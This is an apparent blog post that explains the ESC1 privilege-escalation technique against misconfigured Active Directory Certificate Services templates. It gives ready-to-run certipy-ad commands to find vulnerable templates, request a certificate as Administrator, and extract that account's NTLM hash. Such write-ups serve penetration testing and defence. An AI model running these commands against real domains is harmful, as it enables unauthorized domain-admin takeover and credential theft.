Post

ESC1-Attack

Posted Updated
Preview Image
By
1 min read
ESC1-Attack

ESC1 Attack

An ESC1 attack is a privilege escalation technique that exploits misconfigured certificate templates within Microsoft Active Directory Certificate Services (AD CS) to gain unauthorized access to high-privileged accounts, such as Domain Administrators.
This attack enables an adversary to request and receive a digital certificate for a privileged identity, allowing them to authenticate as that user and gain elevated control over the Active Directory environment.

🧩 Root Cause

Three key misconfigurations combine to make ESC1 possible:

  1. Overly Broad Enrollment Permissions – The certificate template’s ACL grants Enroll (or Autoenroll) rights to Domain Users or other low-privileged groups. This means standard users can request certificates from that template.

  2. Subject Supplied by Enrollee (ENROLLEE_SUPPLIES_SUBJECT) – The template allows the requester to specify their own Subject or Subject Alternative Name (SAN). Attackers can insert another user’s UPN/SAMAccountName, making the certificate appear to belong to that target account.

  3. Authentication EKUs Enabled – The certificate template includes Client Authentication or Smartcard Logon EKUs. Certificates with these EKUs can be used for Kerberos PKINIT or certificate-based authentication to services.

âš¡ Attack Power

With the help of this ESC1 vulnerability, an attacker can request any user’s .pfx file and authenticate within the domain using certificate-based authentication.

🧠 Exploitation Example

Step 1: Find the Vulnerable Certificate Template

1
2
3

certipy-ad find -u $username@$domain -p '$password' -dc-ip $target -stdout -vulnerable
# OR
certipy-ad find -username '$controller_user@$domain' -password '$controller_user_pass' -dc-ip $target -stdout -vulnerable

Step 2: Request a Certificate for an Admin Account

1

certipy-ad req -username '$controller_user@$domain' -password '$controller_user_pass' -ca $ca_Name -target $target -template $template_Name -upn Administrator@$domain

Step 3: Authenticate and Extract the NTLM Hash

1

certipy-ad auth -pfx administrator.pfx -dc-ip $target

🧾 Summary

AspectDetails
Attack TypePrivilege Escalation
Service TargetedActive Directory Certificate Services (AD CS)
Main Exploit VectorMisconfigured Certificate Template
ImpactDomain Admin Privilege Escalation
ADCS
ESC1-Attack
This post is licensed under CC BY 4.0 by the author.